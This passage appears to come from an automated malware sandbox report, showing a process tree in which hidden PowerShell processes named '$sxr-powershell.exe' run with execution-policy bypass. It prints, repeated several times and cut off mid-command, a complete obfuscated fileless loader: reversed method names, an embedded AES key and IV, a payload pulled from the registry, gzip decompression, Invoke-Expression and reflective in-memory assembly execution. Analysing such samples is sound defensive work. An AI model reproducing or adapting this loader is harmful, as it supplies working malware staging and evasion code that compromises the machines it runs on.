[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5020
                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1172
                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($oSnpH);$AarSr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2IqKtZxS/FqcdHbBUDZbWg==');$AarSr = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AarSr, 0, $AarSr.Length);$AarSr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AarSr);$jKHVk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw7IB5l0nDJz4V/yoKrAmg==');$jKHVk = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jKHVk, 0, $jKHVk.Length);$jKHVk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jKHVk);$BvkGZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AF0yFBzJZFVK0sW/C+0yOA==');$BvkGZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BvkGZ, 0, $BvkGZ.Length);$BvkGZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BvkGZ);$KJTnP = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IzMxK6yRkvNAq3b86ckOZw==');$KJTnP = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KJTnP, 0, $KJTnP.Length);$KJTnP = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KJTnP);$TjsNY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XQk0rQ8HHWmKAJLDXLuouQ==');$TjsNY0 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY0, 0, $TjsNY0.Length);$TjsNY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY0);$TjsNY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('owtqeXTsnLcs3cgKbzagCA==');$TjsNY1 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY1, 0, $TjsNY1.Length);$TjsNY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY1);$TjsNY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2RVrgdRC9/qmCG1cuVpcPg==');$TjsNY2 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY2, 0, $TjsNY2.Length);$TjsNY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY2);$TjsNY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bl9qQJYdA2YNQzYMsVAcjg==');$TjsNY3 = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY3, 0, $TjsNY3.Length);$TjsNY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY3);$qGrKR.Dispose();$pdyuP1.Dispose();$TSIUN = [Microsoft.Win32.Registry]::$BvkGZ.$jKHVk($TjsNY).$AarSr($qvqLZ);$yZizz=[string[]]$TSIUN.Split('\');$yPDZH=FCxri(pxzLS([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[1])));OSlRe $yPDZH (,[string[]] ('%*'));$QEiEV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($yZizz[0]);$pdyuP = New-Object System.Security.Cryptography.AesManaged;$pdyuP.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$FYZzj = $pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')();$QEiEV = $FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($QEiEV, 0, $QEiEV.Length);$FYZzj.Dispose();$pdyuP.Dispose();$NTbes = New-Object System.IO.MemoryStream(, $QEiEV);$DmFpj = New-Object System.IO.MemoryStream;$FsdiJ = New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::$TjsNY1);$FsdiJ.$KJTnP($DmFpj);$FsdiJ.Dispose();$NTbes.Dispose();$DmFpj.Dispose();$QEiEV = $DmFpj.ToArray();$soNjb = $LRYKC | IEX;$HlzxU = $soNjb::$TjsNY2($QEiEV);$rrXdx = $HlzxU.EntryPoint;$rrXdx.$TjsNY0($null, (, [string[]] ($FNruO)))
                                                                                                    5⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Hide Artifacts: Hidden Window
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2532
                                                                                                  • C:\Windows\$sxr-powershell.exe
                                                                                                    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1520).WaitForExit();[System.Threading.Thread]::Sleep(5000); function pxzLS($faFmv){ $pdyuP=[System.Security.Cryptography.Aes]::Create(); $pdyuP.Mode=[System.Security.Cryptography.CipherMode]::CBC; $pdyuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $pdyuP.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s='); $pdyuP.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw=='); $FYZzj=$pdyuP.('rotpyrceDetaerC'[-1..-15] -join '')(); $KNYFp=$FYZzj.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($faFmv, 0, $faFmv.Length); $FYZzj.Dispose(); $pdyuP.Dispose(); $KNYFp;}function FCxri($faFmv){ $NTbes=New-Object System.IO.MemoryStream(,$faFmv); $DmFpj=New-Object System.IO.MemoryStream; $FsdiJ=New-Object System.IO.Compression.GZipStream($NTbes, [IO.Compression.CompressionMode]::Decompress); $FsdiJ.CopyTo($DmFpj); $FsdiJ.Dispose(); $NTbes.Dispose(); $DmFpj.Dispose(); $DmFpj.ToArray();}function OSlRe($faFmv,$leBfz){ $HlzxU=[System.Reflection.Assembly]::Load([byte[]]$faFmv); $rrXdx=$HlzxU.EntryPoint; $rrXdx.Invoke($null, $leBfz);}$pdyuP1 = New-Object System.Security.Cryptography.AesManaged;$pdyuP1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pdyuP1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pdyuP1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OxaIu4LBH0NHXzEF0JWKUmNYy+n9ONi+4jCixaR9o/s=');$pdyuP1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uNCooA8rmnbarKZacn6rVw==');$qGrKR = $pdyuP1.('rotpyrceDetaerC'[-1..-15] -join '')();$TjsNY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('d6Q+LrrhAwyK1uipjOqPxg==');$TjsNY = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($TjsNY, 0, $TjsNY.Length);$TjsNY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($TjsNY);$qvqLZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('69yeuXffs7ux/zA0YMGKH3dmXSz0P4vgJbmfiMXrzCM=');$qvqLZ = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qvqLZ, 0, $qvqLZ.Length);$qvqLZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qvqLZ);$FNruO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WyXwngz2uglRO6ZAcrg6Ag==');$FNruO = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FNruO, 0, $FNruO.Length);$FNruO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FNruO);$LRYKC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u823wux5O4Fbh5eDFp/+ca2kjBZPfjXdKRiYm5lEi1/uPVvdi4VTw3Skyjvq+xkGRh3uxdMK5Yl30J7OmCvscDDWsBj5l/abJMk7R3rtVFuMmO2mOI8eJ68DpzNoAWbwuQ8vVlvfanC/+gVlAdicm4rn+Kxx0kjBxYQkdhDX8XhlvH9ZzMTYkQh7CAVDqjxzKnDzYFw26lZKBQhJ3luRhFBABAcYg16uXMiNBWXm1Frbp6IbtOgcTJ6GmJT6oeUkTVubIhdaLB7VUJXskuFV2zuoBiAtc2u4ckc48tqLxmOJeVGxobT7YO+ZwoLAQ2B6CuhEmiJDGCKp8eDtuz1gb9zd988pQle6YLnHJpMVjNFOoRCNp14ETcLqZFSwo1TzN6HzbvND0c1LW97hv8uasfQXsb6Vx6v7acbKM+Gce90=');$LRYKC = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($LRYKC, 0, $LRYKC.Length);$LRYKC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($LRYKC);$oSnpH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nSzPWxfvLItLrY6odHpw1Q==');$oSnpH = $qGrKR.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($oSnpH, 0, $oSnpH.Length);$oSnpH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] 